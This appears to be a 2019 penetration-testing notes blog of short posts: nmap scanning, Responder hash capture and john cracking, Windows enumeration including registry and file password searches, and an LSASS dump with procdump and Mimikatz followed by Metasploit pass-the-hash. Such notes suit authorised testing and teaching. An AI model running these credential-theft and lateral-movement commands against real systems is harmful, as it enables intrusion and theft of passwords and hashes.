Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open



example:

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed
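An added example, not part of the original post: the same conversion of nmap grepable output to CSV done in Python, which also copes with hosts that report fewer ports than requested, ports in any order, and missing reverse-DNS names (the sed regex above needs all four ports in fixed order). The scan output it parses is constructed for the example, not a real scan.

```python
import csv
import io
import re

WEB_PORTS = (80, 443, 8080, 8443)

# Constructed sample of "nmap -oG -" output (not a real scan); tabs separate the fields
SAMPLE_OUTPUT = """\
# Nmap 7.80 scan initiated Thu Oct 31 10:00:00 2019 as: nmap -Pn -p 80,443,8080,8443 -oG - 10.99.106.0/24
Host: 10.99.106.10 (test1.local.com)\tStatus: Up
Host: 10.99.106.10 (test1.local.com)\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///
Host: 10.99.106.11 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8080/filtered/tcp//http-proxy///, 8443/closed/tcp//https-alt///
Host: 10.99.106.76 (test2.local.com)\tPorts: 443/open/tcp//https///, 80/closed/tcp//http///\tIgnored State: filtered (2)
# Nmap done at Thu Oct 31 10:00:05 2019 -- 256 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+(.*)$")

def parse_grepable(text):
    """Return {ip: (hostname, {port: state})} for each host line that carries a Ports: field."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines
        ip, name, rest = m.groups()
        # Remaining fields are tab-separated "Key: value" pairs (Status, Ports, Ignored State, ...)
        fields = dict(f.split(": ", 1) for f in rest.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue  # a bare "Status: Up" line has no port data
        states = {}
        for entry in fields["Ports"].split(", "):
            port, state = entry.split("/", 2)[:2]  # "80/open/tcp//http///" -> 80, open
            states[int(port)] = state
        hosts[ip] = (name, states)
    return hosts

def to_csv(text, ports=WEB_PORTS, only_open=True):
    """Rows of ip,hostname,<state per port>; ports nmap did not report show as n/a."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["ip", "hostname"] + [str(p) for p in ports])
    for ip, (name, states) in parse_grepable(text).items():
        row = [states.get(p, "n/a") for p in ports]
        if only_open and "open" not in row:
            continue  # mirrors the trailing "| grep open" in the one-liner
        writer.writerow([ip, name] + row)
    return out.getvalue()
```

Feed it real output with `to_csv(open("scan.gnmap").read())` or pipe `nmap ... -oG -` into it; the `n/a` marker makes hosts with incomplete port data visible instead of silently dropping them.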

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

# Read the ARP cache; on Windows "arp -a" prints MACs as xx-xx-xx-xx-xx-xx
myCmd = os.popen("arp -a").read()
print(myCmd)

lookup = MacLookup()  # build the lookup object once instead of per address
for line in myCmd.splitlines():
    for item in line.split():
        # MAC addresses contain single dashes; "---" only appears in the "Interface:" header lines
        if "-" in item and "--" not in item:
            try:
                print(item + ": " + lookup.lookup(item))
            except Exception:  # vendor not in the OUI database or item is not a valid MAC
                print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION

Get File Shares Drive Letters wmic logicaldisk

>wmic logicaldisk get caption, description, providername
Caption  Description         ProviderName
C:       Local Fixed Disk
X:       Network Connection  \\server\user\XXX
Y:       Network Connection  \\server\public

Print all environment variables "set"

>set

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default

Patches Installed wmic qfe

>wmic qfe

Caption                                     CSName       Description      FixComments  HotFixID   InstallDate  InstalledBy          InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=4514366  PCNAME Update                        KB4514366               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855  PCNAME  Update                        KB4515855
http://support.microsoft.com/?kbid=4465065  PCNAME  Update                        KB4465065               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788  PCNAME  Security Update               KB4470788                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907  PCNAME  Security Update               KB4489907                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308  PCNAME  Security Update               KB4503308               NT AUTHORITY\SYSTEM  XX/XX/XXXX

Windows Systeminfo

>systeminfo | findstr /C:"OS Name" /C:"OS Version"

OS Name:                   Microsoft Windows 10
OS Version:                10.0.XXX N/A Build XXXX
BIOS Version:              Dell Inc. 1.XX, XX/XX/XXX

Tuesday, October 15, 2019

Powershell listening on a port

# Listen on all interfaces, accept one client and echo back whatever it sends
$socket = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, 1080)
$socket.Start()
$client = $socket.AcceptTcpClient()
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] 2048

try
{
    do
    {
        # Read blocks until data arrives and returns 0 when the peer closes the connection
        $read = $stream.Read($buffer, 0, $buffer.Length)
        if ($read -gt 0) {
            # Decode only the bytes actually received rather than the whole buffer
            $data = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read).TrimEnd()
            if ($data.Length -gt 0) {
                Write-Output ("RECEIVED : [{0}]" -f $data)
                $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                $stream.Write($sendBack, 0, $sendBack.Length)
                Write-Output ("SENT BACK: [{0}]" -f $data)
            }
        }
    } while ($read -gt 0)
}
finally
{
    # Release everything that was opened, in reverse order
    $stream.Dispose()
    $client.Close()
    $socket.Stop()
}

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run




good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.